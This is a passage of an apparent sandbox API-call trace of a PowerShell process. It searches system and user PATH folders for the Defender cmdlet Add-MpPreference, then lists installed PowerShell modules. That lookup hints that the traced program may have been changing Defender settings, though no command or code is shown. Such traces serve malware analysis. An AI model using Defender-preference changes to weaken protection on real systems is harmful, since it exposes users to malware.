lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0262.659] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Add-MpPreference.*" (normalized: "c:\\windows\\system32\\add-mppreference.*"), lpFindFileData=0x1b83e3c0 | out: lpFindFileData=0x1b83e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0262.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e2e8) returned 1 [0262.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e4f8) returned 1 [0262.660] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0262.660] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0262.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e388) returned 1 [0262.660] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6b0 | out: lpFileInformation=0x1b83e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a6eea36, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x10935f52, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x4016bb7c, ftLastWriteTime.dwHighDateTime=0x1da42db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0262.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e338) returned 1 [0262.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e618) returned 1 [0262.660] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0262.661] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0262.661] FindFirstFileW (in: lpFileName="C:\\Windows\\Add-MpPreference.*" (normalized: "c:\\windows\\add-mppreference.*"), lpFindFileData=0x1b83e3c0 | out: lpFindFileData=0x1b83e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0262.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e2e8) returned 1 [0262.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e4f8) returned 1 [0262.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0262.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0262.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e388) returned 1 [0262.790] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6b0 | out: lpFileInformation=0x1b83e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89916a9, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdeb7afab, ftLastAccessTime.dwHighDateTime=0x1da9888, ftLastWriteTime.dwLowDateTime=0x9b9fc00d, ftLastWriteTime.dwHighDateTime=0x1d94219, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0262.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e338) returned 1 [0262.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e618) returned 1 [0262.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0262.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0262.791] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Add-MpPreference.*" (normalized: "c:\\windows\\system32\\wbem\\add-mppreference.*"), lpFindFileData=0x1b83e3c0 | out: lpFindFileData=0x1b83e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0262.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e2e8) returned 1 [0262.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e4f8) returned 1 [0262.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0262.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0262.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e388) returned 1 [0262.792] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6b0 | out: lpFileInformation=0x1b83e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x185cabf5, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xf00bc16c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0262.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e338) returned 1 [0262.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e618) returned 1 [0262.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0262.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0262.793] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Add-MpPreference.*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\add-mppreference.*"), lpFindFileData=0x1b83e3c0 | out: lpFindFileData=0x1b83e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0262.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e2e8) returned 1 [0262.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e4f8) returned 1 [0262.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0262.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\OpenSSH\\", lpFilePart=0x0) returned 0x1c [0262.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e388) returned 1 [0262.793] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\" (normalized: "c:\\windows\\system32\\openssh"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6b0 | out: lpFileInformation=0x1b83e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc35557df, ftCreationTime.dwHighDateTime=0x1d5ace3, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xc35557df, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0262.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e338) returned 1 [0262.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e618) returned 1 [0262.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0262.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\OpenSSH\\", lpFilePart=0x0) returned 0x1c [0262.794] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\Add-MpPreference.*" (normalized: "c:\\windows\\system32\\openssh\\add-mppreference.*"), lpFindFileData=0x1b83e3c0 | out: lpFindFileData=0x1b83e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0262.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e2e8) returned 1 [0262.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e4f8) returned 1 [0262.797] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0262.797] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x37, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x36 [0262.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e388) returned 1 [0262.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windowsapps"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6b0 | out: lpFileInformation=0x1b83e6b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x328a853a, ftCreationTime.dwHighDateTime=0x1d94219, ftLastAccessTime.dwLowDateTime=0xab3cb4c3, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x52077e10, ftLastWriteTime.dwHighDateTime=0x1d94212, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0262.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e338) returned 1 [0262.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e618) returned 1 [0262.797] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0262.797] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x37, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x36 [0262.798] FindFirstFileW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps\\Add-MpPreference.*" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windowsapps\\add-mppreference.*"), lpFindFileData=0x1b83e3c0 | out: lpFindFileData=0x1b83e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0262.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e2e8) returned 1 [0262.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e4f8) returned 1 [0262.806] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b83e470, nSize=0xf1 | out: lpBuffer="") returned 0x94 [0262.811] GetFileAttributesW (lpFileName="C:\\Users\\OqXZRaykm\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\oqxzraykm\\documents\\windowspowershell\\modules")) returned 0xffffffff [0262.824] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0262.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0262.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0262.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0262.875] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c368a7, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7cf0 [0262.875] FindNextFileW (in: hFindFile=0x1acc7cf0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c368a7, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0262.875] FindNextFileW (in: hFindFile=0x1acc7cf0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c368a7, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Operation.Validation", cAlternateFileName="")) returned 1 [0262.876] FindNextFileW (in: hFindFile=0x1acc7cf0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c5ca32, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="")) returned 1 [0262.876] FindNextFileW (in: hFindFile=0x1acc7cf0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c5ca32, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0262.876] FindNextFileW (in: hFindFile=0x1acc7cf0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c82c9e, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="")) returned 1 [0262.876] FindNextFileW (in: hFindFile=0x1acc7cf0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c82c9e, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="")) returned 1 [0262.876] FindNextFileW (in: hFindFile=0x1acc7cf0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0262.876] FindClose (in: hFindFile=0x1acc7cf0 | out: hFindFile=0x1acc7cf0) returned 1 [0262.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0262.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0262.877] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0262.878] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0262.878] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0262.878] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0262.879] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0262.879] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0262.880] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0262.880] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x55, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x54 [0262.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0262.880] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0262.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0262.881] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0262.881] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0262.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0262.881] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0262.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0262.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x32 [0262.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x32, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0262.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0262.882] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0262.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0262.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0262.882] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0262.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0262.882] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0262.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0262.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0262.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0262.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0262.883] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, 